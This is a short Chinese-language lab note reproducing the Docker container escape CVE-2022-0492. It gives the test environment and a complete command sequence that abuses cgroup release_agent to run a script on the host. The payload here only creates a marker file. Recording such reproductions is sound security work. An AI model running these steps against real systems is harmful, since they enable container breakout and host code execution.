系統 - Docker - Container Escape - CVE-2022-0492



參考資訊:
https://github.com/chenaotian/CVE-2022-0492
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/containerd.io_1.2.13-2_amd64.deb
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb

測試環境
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9

測試步驟

$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash
cve:/# unshare -UrmC --propagation=unchanged bash
cve:/# mkdir /tmp/test
cve:/# mount -t cgroup -o rdma cgroup /tmp/test
cve:/# mkdir /tmp/test/x 
cve:/# echo 1 > /tmp/test/x/notify_on_release
cve:/# echo '#!/bin/sh' > /cmd
cve:/# echo "touch /tmp/cve_test" >> /cmd
cve:/# chmod 0777 /cmd
cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
cve:/# echo "$host_path/cmd" > /tmp/test/release_agent
cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs"
cve:/# exit
cve:/# exit

# ls /tmp
    cve_test

P.S. unshare後面可以直接接命令,如:unshare -UrmC mount -t group -o release_agent=test cgroup /mnt